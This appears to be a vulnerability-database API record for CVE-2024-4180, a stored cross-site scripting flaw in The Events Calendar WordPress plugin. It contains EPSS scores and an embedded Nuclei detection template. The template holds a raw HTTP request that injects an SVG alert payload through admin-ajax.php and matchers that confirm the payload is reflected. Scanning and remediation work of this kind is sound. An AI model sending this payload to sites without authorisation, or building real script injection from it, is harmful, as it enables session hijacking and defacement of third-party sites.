{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-4180/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-4180/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-4180/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-4180/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-4180/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-4180/enrichment"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-4180"
    },
    "vulnerability": {
      "href": "/api/v1/vulnerability/cve-2024-4180"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.02079,
      "kev": false,
      "percentile": 0.81503
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-4180.yaml",
      "nuclei_template_severity": "medium",
      "nuclei_template_yaml": "id: CVE-2024-4180\n\ninfo:\n  name: The Events Calendar < 6.4.0.1 - Cross-site Scripting\n  author: 0x_Akoko\n  severity: medium\n  description: |\n    The Events Calendar WordPress plugin < 6.4.0.1 contains a stored XSS caused by improper sanitization of user-submitted content when rendering views via AJAX, letting attackers execute scripts in the context of the affected site. Exploitation requires user interaction.\n  impact: |\n    Attackers can execute arbitrary scripts in the context of the affected site, leading to potential session hijacking or defacement.\n  remediation: |\n    Update to version 6.4.0.1 or later.\n  reference:\n    - https://wpscan.com/vulnerability/b2a92316-e404-4a5e-8426-f88df6e87550/\n    - https://wordpress.org/plugins/the-events-calendar/\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-4180\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 9.1\n    cve-id: CVE-2024-4180\n    cwe-id: CWE-79\n    epss-score: 0.02079\n    epss-percentile: 0.81558\n    cpe: cpe:2.3:a:stellarwp:the_events_calendar:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: stellarwp\n    product: the_events_calendar\n    framework: wordpress\n    fofa-query: body=\"wp-content/plugins/the-events-calendar/\"\n    publicwww-query: \"/wp-content/plugins/the-events-calendar/\"\n  tags: cve,cve2024,wordpress,wp-plugin,wp,wpscan,the-events-calendar,xss,vuln,vkev\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=tribe_events_views_v2_fallback&view=reflector&view_data[lala]='<svg alert(document.domain)>'\n\n    matchers:\n      - type: dsl\n        dsl:\n          - contains_all(body, '<svg alert(document.domain)>', 'event_display_mode')\n          - contains(content_type, 'text/html')\n          - status_code == 200\n        condition: and\n# digest: 4b0a0048304602210080f907160a8c5fff275f50c0814231558f61ae88aef7a0f107585a9b0e4e5257022100bee1ed6f34d431518daf3b459f12ad0de23e9ff8805874dab96f0ddf087e3f48:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-4180"
}